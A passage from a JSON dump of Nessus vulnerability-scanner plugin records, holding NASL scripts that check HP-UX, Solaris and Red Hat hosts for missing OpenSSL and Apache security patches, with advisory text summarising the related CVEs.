(DoS) (HPSBUX01019 SSRT4717 rev.3)\");\n script_summary(english:\"Checks for the patch in the swlist output\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote HP-UX host is missing a security-related patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"s700_800 11.04 Virtualvault 4.6 IWS update : \n\nTwo potential security vulnerabilities have been identified in OpenSSL\nby NISCC (224012/1 and 224012/2). The Common Vulnerabilities and\nExposures project has referenced them as the following CAN-2004-0079,\nand CAN-2004-0112. The CERT summary is TA04-078A. 1. The\ndo_change_cipher_spec function in OpenSSL allows remote attackers to\ncause a denial of service via a crafted SSL/TLS handshake that\ntriggers a null dereference. CVE-2004-0079 2. The SSL/TLS handshaking,\nwhen using Kerberos ciphersuites, does not properly check the length\nof Kerberos tickets during a handshake, which allows remote attackers\nto cause a denial of service via a crafted SSL/TLS handshake that\ncauses an out-of-bounds read. CVE-2004-0112.\"\n );\n # http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c00944046\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?6195bc72\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Install patch PHSS_30643 or subsequent.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:P/A:N\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:hp:hp-ux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2004/04/06\");\n script_set_attribute(attribute:\"patch_modification_date\", value:\"2007/04/05\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2005/03/18\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2005-2021 Tenable Network Security, Inc.\");\n script_family(english:\"HP-UX Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/HP-UX/version\", \"Host/HP-UX/swlist\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"hpux.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/HP-UX/version\")) audit(AUDIT_OS_NOT, \"HP-UX\");\nif (!get_kb_item(\"Host/HP-UX/swlist\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nif (!hpux_check_ctx(ctx:\"11.04\"))\n{\n exit(0, \"The host is not affected since PHSS_30643 applies to a different OS release.\");\n}\n\npatches = make_list(\"PHSS_30643\", \"PHSS_30946\", \"PHSS_31825\", \"PHSS_32139\", \"PHSS_32206\", \"PHSS_34170\", \"PHSS_35105\", \"PHSS_35307\", \"PHSS_35459\", \"PHSS_35554\");\nforeach patch (patches)\n{\n if (hpux_installed(app:patch))\n {\n exit(0, \"The host is not affected because patch \"+patch+\" is installed.\");\n }\n}\n\n\nflag = 0;\nif (hpux_check_patch(app:\"VaultTS.VV-IWS\", version:\"A.04.60\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:hpux_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-11-29T16:12:41", "description": "s700_800 11.04 Virtualvault 4.7 IWS update : \n\nTwo potential security vulnerabilities have been identified in OpenSSL by NISCC (224012/1 and 224012/2). The Common Vulnerabilities and Exposures project has referenced them as the following CAN-2004-0079, and CAN-2004-0112. The CERT summary is TA04-078A. 1. The do_change_cipher_spec function in OpenSSL allows remote attackers to cause a denial of service via a crafted SSL/TLS handshake that triggers a null dereference. CVE-2004-0079 2. The SSL/TLS handshaking, when using Kerberos ciphersuites, does not properly check the length of Kerberos tickets during a handshake, which allows remote attackers to cause a denial of service via a crafted SSL/TLS handshake that causes an out-of-bounds read. CVE-2004-0112.", "cvss3": {}, "published": "2005-02-16T00:00:00", "type": "nessus", "title": "HP-UX PHSS_30639 : HP-UX Running Apache, Remote Denial of Service (DoS) (HPSBUX01019 SSRT4717 rev.3)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2003-0020", "CVE-2004-0079", "CVE-2004-0112", "CVE-2004-0113", "CVE-2004-0174"], "modified": "2021-01-11T00:00:00", "cpe": ["cpe:/o:hp:hp-ux"], "id": "HPUX_PHSS_30639.NASL", "href": "https://www.tenable.com/plugins/nessus/17071", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and patch checks in this plugin were \n# extracted from HP patch PHSS_30639. The text itself is\n# copyright (C) Hewlett-Packard Development Company, L.P.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(17071);\n script_version(\"1.18\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2003-0020\", \"CVE-2004-0079\", \"CVE-2004-0112\", \"CVE-2004-0113\", \"CVE-2004-0174\");\n script_xref(name:\"HP\", value:\"emr_na-c00944046\");\n script_xref(name:\"HP\", value:\"HPSBUX01019\");\n script_xref(name:\"HP\", value:\"SSRT4717\");\n\n script_name(english:\"HP-UX PHSS_30639 : HP-UX Running Apache, Remote Denial of Service (DoS) (HPSBUX01019 SSRT4717 rev.3)\");\n script_summary(english:\"Checks for the patch in the swlist output\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote HP-UX host is missing a security-related patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"s700_800 11.04 Virtualvault 4.7 IWS update : \n\nTwo potential security vulnerabilities have been identified in OpenSSL\nby NISCC (224012/1 and 224012/2). The Common Vulnerabilities and\nExposures project has referenced them as the following CAN-2004-0079,\nand CAN-2004-0112. The CERT summary is TA04-078A. 1. The\ndo_change_cipher_spec function in OpenSSL allows remote attackers to\ncause a denial of service via a crafted SSL/TLS handshake that\ntriggers a null dereference. CVE-2004-0079 2. The SSL/TLS handshaking,\nwhen using Kerberos ciphersuites, does not properly check the length\nof Kerberos tickets during a handshake, which allows remote attackers\nto cause a denial of service via a crafted SSL/TLS handshake that\ncauses an out-of-bounds read. CVE-2004-0112.\"\n );\n # http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c00944046\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?6195bc72\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Install patch PHSS_30639 or subsequent.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:P/A:N\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:hp:hp-ux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2004/04/20\");\n script_set_attribute(attribute:\"patch_modification_date\", value:\"2007/04/05\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2005/02/16\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2005-2021 Tenable Network Security, Inc.\");\n script_family(english:\"HP-UX Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/HP-UX/version\", \"Host/HP-UX/swlist\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"hpux.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/HP-UX/version\")) audit(AUDIT_OS_NOT, \"HP-UX\");\nif (!get_kb_item(\"Host/HP-UX/swlist\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nif (!hpux_check_ctx(ctx:\"11.04\"))\n{\n exit(0, \"The host is not affected since PHSS_30639 applies to a different OS release.\");\n}\n\npatches = make_list(\"PHSS_30639\", \"PHSS_30944\", \"PHSS_31823\", \"PHSS_32140\", \"PHSS_34169\", \"PHSS_35106\", \"PHSS_35308\", \"PHSS_35460\", \"PHSS_35555\");\nforeach patch (patches)\n{\n if (hpux_installed(app:patch))\n {\n exit(0, \"The host is not affected because patch \"+patch+\" is installed.\");\n }\n}\n\n\nflag = 0;\nif (hpux_check_patch(app:\"VaultTS.VV-CORE-CMN\", version:\"A.04.70\")) flag++;\nif (hpux_check_patch(app:\"VaultTS.VV-IWS\", version:\"A.04.70\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:hpux_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-11-29T16:14:36", "description": "s700_800 11.04 Virtualvault 4.6 TGP update : \n\nTwo potential security vulnerabilities have been identified in OpenSSL by NISCC (224012/1 and 224012/2). The Common Vulnerabilities and Exposures project has referenced them as the following CAN-2004-0079, and CAN-2004-0112. The CERT summary is TA04-078A. 1. The do_change_cipher_spec function in OpenSSL allows remote attackers to cause a denial of service via a crafted SSL/TLS handshake that triggers a null dereference. CVE-2004-0079 2. The SSL/TLS handshaking, when using Kerberos ciphersuites, does not properly check the length of Kerberos tickets during a handshake, which allows remote attackers to cause a denial of service via a crafted SSL/TLS handshake that causes an out-of-bounds read. CVE-2004-0112.", "cvss3": {}, "published": "2005-03-18T00:00:00", "type": "nessus", "title": "HP-UX PHSS_30646 : HP-UX Running Apache, Remote Denial of Service (DoS) (HPSBUX01019 SSRT4717 rev.3)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2003-0020", "CVE-2004-0079", "CVE-2004-0112", "CVE-2004-0113", "CVE-2004-0174"], "modified": "2021-01-11T00:00:00", "cpe": ["cpe:/o:hp:hp-ux"], "id": "HPUX_PHSS_30646.NASL", "href": "https://www.tenable.com/plugins/nessus/17531", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and patch checks in this plugin were \n# extracted from HP patch PHSS_30646. The text itself is\n# copyright (C) Hewlett-Packard Development Company, L.P.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(17531);\n script_version(\"1.16\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2003-0020\", \"CVE-2004-0079\", \"CVE-2004-0112\", \"CVE-2004-0113\", \"CVE-2004-0174\");\n script_xref(name:\"HP\", value:\"emr_na-c00944046\");\n script_xref(name:\"HP\", value:\"HPSBUX01019\");\n script_xref(name:\"HP\", value:\"SSRT4717\");\n\n script_name(english:\"HP-UX PHSS_30646 : HP-UX Running Apache, Remote Denial of Service (DoS) (HPSBUX01019 SSRT4717 rev.3)\");\n script_summary(english:\"Checks for the patch in the swlist output\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote HP-UX host is missing a security-related patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"s700_800 11.04 Virtualvault 4.6 TGP update : \n\nTwo potential security vulnerabilities have been identified in OpenSSL\nby NISCC (224012/1 and 224012/2). The Common Vulnerabilities and\nExposures project has referenced them as the following CAN-2004-0079,\nand CAN-2004-0112. The CERT summary is TA04-078A. 1. The\ndo_change_cipher_spec function in OpenSSL allows remote attackers to\ncause a denial of service via a crafted SSL/TLS handshake that\ntriggers a null dereference. CVE-2004-0079 2. The SSL/TLS handshaking,\nwhen using Kerberos ciphersuites, does not properly check the length\nof Kerberos tickets during a handshake, which allows remote attackers\nto cause a denial of service via a crafted SSL/TLS handshake that\ncauses an out-of-bounds read. CVE-2004-0112.\"\n );\n # http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c00944046\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?6195bc72\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Install patch PHSS_30646 or subsequent.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:P/A:N\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:hp:hp-ux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2004/04/19\");\n script_set_attribute(attribute:\"patch_modification_date\", value:\"2007/04/05\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2005/03/18\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2005-2021 Tenable Network Security, Inc.\");\n script_family(english:\"HP-UX Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/HP-UX/version\", \"Host/HP-UX/swlist\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"hpux.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/HP-UX/version\")) audit(AUDIT_OS_NOT, \"HP-UX\");\nif (!get_kb_item(\"Host/HP-UX/swlist\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nif (!hpux_check_ctx(ctx:\"11.04\"))\n{\n exit(0, \"The host is not affected since PHSS_30646 applies to a different OS release.\");\n}\n\npatches = make_list(\"PHSS_30646\", \"PHSS_34165\", \"PHSS_35480\", \"PHSS_35559\");\nforeach patch (patches)\n{\n if (hpux_installed(app:patch))\n {\n exit(0, \"The host is not affected because patch \"+patch+\" is installed.\");\n }\n}\n\n\nflag = 0;\nif (hpux_check_patch(app:\"VaultTGP.TGP-CORE\", version:\"A.04.60\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:hpux_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-11-29T16:14:52", "description": "s700_800 11.04 Virtualvault 4.7 TGP update : \n\nTwo potential security vulnerabilities have been identified in OpenSSL by NISCC (224012/1 and 224012/2). The Common Vulnerabilities and Exposures project has referenced them as the following CAN-2004-0079, and CAN-2004-0112. The CERT summary is TA04-078A. 1. The do_change_cipher_spec function in OpenSSL allows remote attackers to cause a denial of service via a crafted SSL/TLS handshake that triggers a null dereference. CVE-2004-0079 2. The SSL/TLS handshaking, when using Kerberos ciphersuites, does not properly check the length of Kerberos tickets during a handshake, which allows remote attackers to cause a denial of service via a crafted SSL/TLS handshake that causes an out-of-bounds read. CVE-2004-0112.", "cvss3": {}, "published": "2005-03-18T00:00:00", "type": "nessus", "title": "HP-UX PHSS_30642 : HP-UX Running Apache, Remote Denial of Service (DoS) (HPSBUX01019 SSRT4717 rev.3)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2003-0020", "CVE-2004-0079", "CVE-2004-0112", "CVE-2004-0113", "CVE-2004-0174"], "modified": "2021-01-11T00:00:00", "cpe": ["cpe:/o:hp:hp-ux"], "id": "HPUX_PHSS_30642.NASL", "href": "https://www.tenable.com/plugins/nessus/17527", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and patch checks in this plugin were \n# extracted from HP patch PHSS_30642. The text itself is\n# copyright (C) Hewlett-Packard Development Company, L.P.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(17527);\n script_version(\"1.16\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2003-0020\", \"CVE-2004-0079\", \"CVE-2004-0112\", \"CVE-2004-0113\", \"CVE-2004-0174\");\n script_xref(name:\"HP\", value:\"emr_na-c00944046\");\n script_xref(name:\"HP\", value:\"HPSBUX01019\");\n script_xref(name:\"HP\", value:\"SSRT4717\");\n\n script_name(english:\"HP-UX PHSS_30642 : HP-UX Running Apache, Remote Denial of Service (DoS) (HPSBUX01019 SSRT4717 rev.3)\");\n script_summary(english:\"Checks for the patch in the swlist output\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote HP-UX host is missing a security-related patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"s700_800 11.04 Virtualvault 4.7 TGP update : \n\nTwo potential security vulnerabilities have been identified in OpenSSL\nby NISCC (224012/1 and 224012/2). The Common Vulnerabilities and\nExposures project has referenced them as the following CAN-2004-0079,\nand CAN-2004-0112. The CERT summary is TA04-078A. 1. The\ndo_change_cipher_spec function in OpenSSL allows remote attackers to\ncause a denial of service via a crafted SSL/TLS handshake that\ntriggers a null dereference. CVE-2004-0079 2. The SSL/TLS handshaking,\nwhen using Kerberos ciphersuites, does not properly check the length\nof Kerberos tickets during a handshake, which allows remote attackers\nto cause a denial of service via a crafted SSL/TLS handshake that\ncauses an out-of-bounds read. CVE-2004-0112.\"\n );\n # http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c00944046\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?6195bc72\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Install patch PHSS_30642 or subsequent.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:P/A:N\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:hp:hp-ux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2004/05/12\");\n script_set_attribute(attribute:\"patch_modification_date\", value:\"2007/04/05\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2005/03/18\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2005-2021 Tenable Network Security, Inc.\");\n script_family(english:\"HP-UX Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/HP-UX/version\", \"Host/HP-UX/swlist\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"hpux.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/HP-UX/version\")) audit(AUDIT_OS_NOT, \"HP-UX\");\nif (!get_kb_item(\"Host/HP-UX/swlist\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nif (!hpux_check_ctx(ctx:\"11.04\"))\n{\n exit(0, \"The host is not affected since PHSS_30642 applies to a different OS release.\");\n}\n\npatches = make_list(\"PHSS_30642\", \"PHSS_34164\", \"PHSS_35481\", \"PHSS_35560\");\nforeach patch (patches)\n{\n if (hpux_installed(app:patch))\n {\n exit(0, \"The host is not affected because patch \"+patch+\" is installed.\");\n }\n}\n\n\nflag = 0;\nif (hpux_check_patch(app:\"VaultTGP.TGP-CORE\", version:\"A.04.70\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:hpux_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-11-29T14:11:46", "description": "SunOS 5.9_x86: Apache Security Patch.\nDate this patch was last updated by Sun : Mar/05/10", "cvss3": {}, "published": "2004-07-12T00:00:00", "type": "nessus", "title": "Solaris 9 (x86) : 114145-12", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2003-0020", "CVE-2003-0542", "CVE-2003-0987", "CVE-2003-0993", "CVE-2004-0174", "CVE-2004-0492", "CVE-2007-1349"], "modified": "2021-01-14T00:00:00", "cpe": ["cpe:/o:sun:solaris"], "id": "SOLARIS9_X86_114145.NASL", "href": "https://www.tenable.com/plugins/nessus/13593", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text in this plugin was\n# extracted from the Oracle SunOS Patch Updates.\n#\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(13593);\n script_version(\"1.39\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2003-0020\", \"CVE-2003-0542\", \"CVE-2003-0987\", \"CVE-2003-0993\", \"CVE-2004-0174\", \"CVE-2004-0492\", \"CVE-2007-1349\");\n\n script_name(english:\"Solaris 9 (x86) : 114145-12\");\n script_summary(english:\"Check for patch 114145-12\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote host is missing Sun Security Patch number 114145-12\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"SunOS 5.9_x86: Apache Security Patch.\nDate this patch was last updated by Sun : Mar/05/10\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://download.oracle.com/sunalerts/1021709.1.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"You should install this patch for your system to be up-to-date.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_cwe_id(119, 399);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:sun:solaris\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2010/03/05\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2004/07/12\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2004-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Solaris Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Solaris/showrev\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"solaris.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nif (solaris_check_patch(release:\"5.9_x86\", arch:\"i386\", patch:\"114145-12\", obsoleted_by:\"\", package:\"SUNWapchu\", version:\"11.9.0,REV=2002.08.06.16.05\") < 0) flag++;\nif (solaris_check_patch(release:\"5.9_x86\", arch:\"i386\", patch:\"114145-12\", obsoleted_by:\"\", package:\"SUNWapchd\", version:\"11.9.0,REV=2002.08.06.16.05\") < 0) flag++;\nif (solaris_check_patch(release:\"5.9_x86\", arch:\"i386\", patch:\"114145-12\", obsoleted_by:\"\", package:\"SUNWapchS\", version:\"11.9.0,REV=2002.08.06.16.05\") < 0) flag++;\nif (solaris_check_patch(release:\"5.9_x86\", arch:\"i386\", patch:\"114145-12\", obsoleted_by:\"\", package:\"SUNWapchr\", version:\"11.9.0,REV=2002.08.06.16.05\") < 0) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:solaris_get_report());\n else security_hole(0);\n exit(0);\n}\naudit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-11-29T14:19:23", "description": "SunOS 5.8: Apache Patch.\nDate this patch was last updated by Sun : Apr/24/08", "cvss3": {}, "published": "2004-10-17T00:00:00", "type": "nessus", "title": "Solaris 8 (sparc) : 116973-07", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2003-0020", "CVE-2003-0542", "CVE-2003-0987", "CVE-2003-0993", "CVE-2004-0174", "CVE-2004-0492", "CVE-2007-1349"], "modified": "2021-01-14T00:00:00", "cpe": ["cpe:/o:sun:solaris"], "id": "SOLARIS8_116973.NASL", "href": "https://www.tenable.com/plugins/nessus/15482", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text in this plugin was\n# extracted from the Oracle SunOS Patch Updates.\n#\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(15482);\n script_version(\"1.37\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2003-0020\", \"CVE-2003-0542\", \"CVE-2003-0987\", \"CVE-2003-0993\", \"CVE-2004-0174\", \"CVE-2004-0492\", \"CVE-2007-1349\");\n\n script_name(english:\"Solaris 8 (sparc) : 116973-07\");\n script_summary(english:\"Check for patch 116973-07\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote host is missing Sun Security Patch number 116973-07\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"SunOS 5.8: Apache Patch.\nDate this patch was last updated by Sun : Apr/24/08\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://getupdates.oracle.com/readme/116973-07\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"You should install this patch for your system to be up-to-date.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_cwe_id(119, 399);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:sun:solaris\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2008/04/24\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2004/10/17\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2004-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Solaris Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Solaris/showrev\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"solaris.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nif (solaris_check_patch(release:\"5.8\", arch:\"sparc\", patch:\"116973-07\", obsoleted_by:\"\", package:\"SUNWapchu\", version:\"11.8.0,REV=2000.01.08.18.12\") < 0) flag++;\nif (solaris_check_patch(release:\"5.8\", arch:\"sparc\", patch:\"116973-07\", obsoleted_by:\"\", package:\"SUNWapchd\", version:\"11.8.0,REV=2000.01.08.18.12\") < 0) flag++;\nif (solaris_check_patch(release:\"5.8\", arch:\"sparc\", patch:\"116973-07\", obsoleted_by:\"\", package:\"SUNWapchS\", version:\"11.8.0,REV=2000.01.08.18.12\") < 0) flag++;\nif (solaris_check_patch(release:\"5.8\", arch:\"sparc\", patch:\"116973-07\", obsoleted_by:\"\", package:\"SUNWapchr\", version:\"11.8.0,REV=2000.01.08.18.12\") < 0) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:solaris_get_report());\n else security_hole(0);\n exit(0);\n}\naudit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-11-29T14:13:47", "description": "This plugin writes in the knowledge base the CVE ids that we know Red Hat enterprise Linux is not vulnerable to.", "cvss3": {}, "published": "2004-07-06T00:00:00", "type": "nessus", "title": "Red Hat Enterprise Linux fixes", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2000-0666", "CVE-2003-0020", "CVE-2003-0192", "CVE-2003-0252", "CVE-2003-0682", "CVE-2003-0693", "CVE-2003-0695"], "modified": "2011-11-03T00:00:00", "cpe": [], "id": "REDHAT_FIXES.NASL", "href": "https://www.tenable.com/plugins/nessus/12512", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n#\n\nif ( ! defined_func(\"bn_random\") ) exit(0);\n\ninclude(\"compat.inc\");\n\nif(description)\n{\n script_id(12512);\n script_version (\"$Revision: 1.11 $\");\n script_cvs_date(\"$Date: 2011/11/03 18:08:43 $\");\n\t\t\t\n script_name(english: \"Red Hat Enterprise Linux fixes\");\n \n script_set_attribute(attribute:\"synopsis\", value:\n\"The RedHat version have been identified.\" );\n script_set_attribute(attribute:\"description\", value:\n\"This plugin writes in the knowledge base the CVE ids that we know\nRed Hat enterprise Linux is not vulnerable to.\" );\n script_set_attribute(attribute:\"solution\", value:\n\"N/A\" );\n script_set_attribute(attribute:\"risk_factor\", value:\"None\" );\n\n script_set_attribute(attribute:\"plugin_publication_date\", value: \"2004/07/06\");\nscript_set_attribute(attribute:\"plugin_type\", value:\"local\");\nscript_end_attributes();\n\n script_summary(english: \"Fill the KB\");\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2004-2011 Tenable Network Security, Inc.\");\n script_family(english: \"Red Hat Local Security Checks\");\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/RedHat/rpm-list\");\n exit(0);\n}\n\n\ninclude(\"rpm.inc\");\n\n\nrelease = get_kb_item(\"Host/RedHat/release\");\nif ( ! release ) exit(0);\nif ( egrep(pattern:\"Red Hat Enterprise Linux.*release 3\", string:release) )\n{\n set_kb_item(name:\"CVE-2000-0666\", value:TRUE);\n set_kb_item(name:\"CVE-2003-0020\", value:TRUE);\n set_kb_item(name:\"CVE-2003-0192\", value:TRUE);\n set_kb_item(name:\"CVE-2003-0252\", value:TRUE);\n set_kb_item(name:\"CVE-2003-0682\", value:TRUE);\n 